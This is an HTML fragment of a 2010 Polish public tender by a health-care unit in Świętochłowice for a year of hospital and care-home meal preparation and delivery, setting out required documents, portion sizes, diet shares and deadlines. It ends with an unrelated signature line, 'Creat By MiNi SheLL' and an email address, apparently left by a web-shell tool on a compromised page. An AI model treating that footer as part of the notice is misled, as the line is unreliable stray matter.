-Aktualną  decyzję    właściwego  Państwowego Inspektora Sanitarnego, wydaną na podstawie przepisów ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171, poz. 1225, z późn. zm.), zmienionej regulacjami ustawy  z   dnia 8 stycznia 2010 r.  o zmianie ustawy  o bezpieczeństwie żywności i żywienia oraz niektórych innych ustaw (Dz.  U. z 2010 r., Nr 21 poz. 105) stwierdzającą, że zakład (kuchnia, stołówka), w którym będą  przygotowywane posiłki  spełnia konieczne wymagania niezbędne do zapewnienia higieny i    właściwej jakości zdrowotnej w zakresie produkcji posiłków oraz usług polegających na produkcji   posiłków dla odbiorców z zewnątrz, zezwalającą na prowadzenie w/w 
 działalności,
-Aktualną  decyzję   właściwego   Państwowego Inspektora Sanitarnego o wyrażeniu zgody na  prowadzenie działalności w   zakresie transportu     posiłków na  zewnątrz odpowiednio przystosowanym do tego celu środkiem transportu,
-Dokumenty stwierdzające,  że osoby,   które     będą      wykonywać      zamówienie posiadają uprawnienia wymagane przepisami o chorobach zakaźnych i zakażeniach, o których    mowa w art. 59 ust 1 i 2 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171, poz. 1225, z późn. zm.), zmienionej regulacjami ustawy  z   dnia 8 stycznia  2010 r.  o zmianie ustawy  o bezpieczeństwie żywności i żywienia oraz niektórych innych  ustaw (Dz. U. z 2010 r., Nr 21 poz. 105),
- Zaakceptowany opis przedmiotu zamówienia- Załącznik nr 6,
- Pełnomocnictwo  do podpisania  i  złożenia oferty,  jeżeli   osoba podpisana nie  jest wymieniona  w   dokumencie  rejestracyjnym    Wykonawcy.     Pełnomocnictwo  należy przedłożyć w oryginale lub w formie kopii potwierdzonej notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 Ustawy Prawo Zamówień Publicznych, Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej trwania, w następujących przypadkach:
a) obniżenia ceny jednostkowej przez Wykonawcę;
b) zmiany urzędowej stawki podatku VAT; 
c) konieczności przedłużenia okresu obowiązywania umowy w przypadku  nie  wykorzystania przewidzianej umową ilości przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół  Opieki Zdrowotnej w Świętochłowicach ul. Chorzowska 38    
sala konferencyjna - pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2010 godzina 10:00, miejsce: Zespół Opieki Zdrowotnej w Świętochłowicach ul. Chorzowska 38   sekretariat- pokój nr 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - Świadczenie usług w zakresie kompleksowego - codziennego i całodobowego - przygotowania i dostarczania posiłków do kuchenek oddziałowych Zakładu Opiekuńczo-Leczniczego przy ul. Szpitalnej 2, 41-600 Świętochłowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przygotowanie i dostarczenie posiłków do około 45 pacjentów  Zakładu Opiekuńczo Leczniczego.  W tym 50%  posiłków stanowi  dieta podstawowa, a pozostałe  50% stanowi dieta: płynna, cukrzycowa, wątrobowa.
Całodobowe wyżywienie powinno składać się z trzech posiłków:
śniadanie, obiad, kolacja,
Śniadanie: zupa mleczna 350ml, pieczywo 100g, masło 15g, herbata 250ml,
Obiad: zupa 350ml, drugie danie (np. porcja kurczaka 180g, ziemniaki 200g, surówka 150g), kompot 250 ml,
Kolacja: pieczywo 100g, masło 15g, herbata 250ml, dodatek (np. wędlina 50g, jajko 50g, dżem 60g).
Zamawiający wymaga aby w jadłospisie dekadowym występowały co najmniej: 4 posiłki mięsne, 3 półmięsne oraz 3 bezmięsne, przy założeniu, iż w niedzielę i święta powinno być dostarczone danie mięsne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.10.00-6, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II - Świadczenie usług w zakresie kompleksowego - codziennego i całodobowego - przygotowania i dostarczania posiłków do kuchenek oddziałowych Szpitala Powiatowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług w zakresie kompleksowego - codziennego i całodobowego - przygotowania i dostarczania posiłków do kuchenek oddziałowych Szpitala Powiatowego:
-  Oddziału  Rehabilitacji Neurologicznej i Ogólnoustrojowej;
-  Oddziału Otolaryngologii;
-  Oddziału Pediatrii;
-  Oddziału Chirurgii;
-  Oddziału Wewnętrznego;
-  Oddziału Psychiatrii;
-  Oddziału  Położniczo - Ginekologicznego.
Ogólna liczba pacjentów Szpitala Powiatowego stanowi około 190 pacjentów, w tym około 20 pacjentów to pacjenci Oddziału Pediatrycznego. 
Całodobowe wyżywienie powinno składać się z trzech posiłków: śniadanie, obiad, kolacja. 
Śniadanie: zupa mleczna 350ml, pieczywo 100g, masło 15g, herbata 250ml, dodatek dla Oddziału Pediatrycznego około 20 dzieci. (np. miód 60g, wędlina 50g, pasztet 50g);
Obiad: zupa 350ml, drugie danie (np. porcja kurczaka 180g, ziemniaki 200g, surówka 150g), kompot 250ml;
Kolacja: pieczywo 100g, masło 15g, herbata 250ml, dodatek (np. wędlina 50g, jajko 50g, dżem 60g).
Zamawiający wymaga aby w jadłospisie dekadowym występowały co najmniej: 4 posiłki mięsne, 3 półmięsne oraz 3 bezmięsne, przy założeniu, iż w niedzielę i święta powinno być dostarczone danie mięsne.
Dieta cukrzycowa i wrzodowa- pięć posiłków, co stanowi 20% ogólnej liczby pacjentów. 
Dieta podstawowa stanowi  50% ogólnej liczby pacjentów, a  diety pozostałe (wątrobowa, lekkostrawna, bezsolna, płynna) stanowią 30%..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.10.00-6, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com